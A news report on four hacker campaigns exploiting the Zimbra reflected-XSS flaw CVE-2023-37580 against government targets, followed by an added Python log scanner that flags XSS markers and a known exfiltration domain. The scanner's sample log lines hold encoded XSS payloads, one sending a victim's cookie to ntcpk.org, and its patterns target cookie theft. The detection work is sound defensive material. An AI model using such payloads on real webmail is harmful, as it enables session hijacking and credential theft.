A zero-day vulnerability in the Zimbra Collaboration email software has been exploited by four distinct hacker groups in real-world attacks, aiming to steal email data, user credentials, and authentication tokens.
According to a report from the Google Threat Analysis Group (TAG) shared with The Hacker News, the majority of these attacks occurred after the initial fix was made public on GitHub.
The identified flaw, designated as CVE-2023-37580 with a CVSS score of 6.1, is a reflected cross-site scripting (XSS) vulnerability affecting versions before 8.8.15 Patch 41. Zimbra addressed this vulnerability through patches released on July 25, 2023.
Exploiting this vulnerability could allow malicious scripts to run in victims’ web browsers simply by enticing them to click on a specially crafted URL. The browser sends the script embedded in that URL to Zimbra as part of the request, and the server reflects it back unescaped in its response, where it executes in the user’s session.
Google TAG, with researcher Clément Lecigne credited for discovering and reporting the bug, revealed that it identified multiple campaign waves starting on June 29, 2023, at least two weeks prior to Zimbra issuing an advisory.
Three out of the four campaigns were observed before the release of the patch, while the fourth campaign was detected a month after the fixes were published.
The initial campaign reportedly targeted a government organization in Greece. Emails carrying exploit URLs were sent to the targets; clicking on these URLs delivered email-stealing malware previously seen in a cyber espionage operation known as EmailThief in February 2022.
The intrusion set, codenamed TEMP_HERETIC by Volexity, also took advantage of a then-zero-day flaw in Zimbra to execute the attacks.
The second threat actor exploiting CVE-2023-37580 is Winter Vivern, focusing on government organizations in Moldova and Tunisia shortly after the vulnerability patch was released on GitHub on July 5.
It is noteworthy that this adversarial collective has previously been associated with exploiting security vulnerabilities in Zimbra Collaboration and Roundcube, as reported by Proofpoint and ESET earlier this year.
Additionally, Google TAG identified a third, unidentified group leveraging the vulnerability before the patch was deployed on July 25. This group targeted a government organization in Vietnam, employing the bug for phishing activities aimed at obtaining credentials.
“In this instance, the exploit URL directed users to a script displaying a phishing page designed to capture webmail credentials. The stolen credentials were then posted to a URL hosted on an official government domain that the attackers likely compromised,” noted TAG.
Lastly, on August 25, a government organization in Pakistan fell victim to the flaw, resulting in the exfiltration of the Zimbra authentication token to a remote domain named “ntcpk[.]org.”
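The attack chain described above (a crafted URL whose script is reflected by the server, followed by credential or token exfiltration) leaves traces in the web server's access log. The following Python example, added here and not part of the report or of Zimbra's code, scans constructed sample log lines for reflected-XSS markers in query parameters and for the exfiltration domain named above; the path `/webmail/view` and the `q` parameter are made-up placeholders, not the actual vulnerable endpoint.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample lines in Combined Log Format (not real traffic). The path
# /webmail/view and its "q" parameter are made-up placeholders, not Zimbra's endpoint.
SAMPLE_LOG = """\
198.51.100.10 - - [29/Jun/2023:10:02:11 +0000] "GET /webmail/view?q=inbox+unread HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [29/Jun/2023:10:05:42 +0000] "GET /webmail/view?q=%3Cscript%3Edocument.location%3D%22https%3A%2F%2Fntcpk.org%2Fc%3F%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [29/Jun/2023:10:05:43 +0000] "GET /webmail/view?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.42 - - [29/Jun/2023:10:07:00 +0000] "GET /webmail/view?q=meeting%20%3C%20tomorrow HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Markup that has no legitimate place in a webmail query parameter: a bare "<" is not
# enough (users search for "a < b"), so require a tag or an inline event handler.
XSS_MARKERS = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"<\s*\w+\b[^>]*\bon\w+\s*=", re.I), "inline event handler"),
    (re.compile(r"document\.(cookie|location)", re.I), "cookie/location access"),
]
KNOWN_EXFIL_DOMAINS = {"ntcpk.org"}  # domain named in the TAG report quoted above

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so nested encoding cannot hide markup."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return the reasons a request target looks like reflected-XSS abuse ([] if clean)."""
    reasons = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)
        reasons += [f"{label} in parameter '{name}'" for pat, label in XSS_MARKERS if pat.search(value)]
        reasons += [f"known exfil domain {d} in parameter '{name}'" for d in KNOWN_EXFIL_DOMAINS if d in value.lower()]
    return reasons

def scan_log(text):
    """Parse each access-log line and collect the suspicious requests with their reasons."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := inspect_request(m["target"])):
            hits.append({"ip": m["ip"], "time": m["ts"], "target": m["target"], "reasons": reasons})
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags the two requests from 198.51.100.23 (including the double-encoded one) and leaves the legitimate "meeting < tomorrow" search alone.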
Google emphasized a recurring pattern where threat actors consistently exploit XSS vulnerabilities in mail servers, underscoring the need for thorough audits of such applications.
“The discovery of at least four campaigns exploiting CVE-2023-37580, three of them occurring after the bug first became public, underscores the importance of organizations promptly applying fixes to their mail servers,” TAG stated. “These campaigns also highlight how attackers monitor open-source repositories to opportunistically exploit vulnerabilities where the fix is in the repository but not yet released to users.”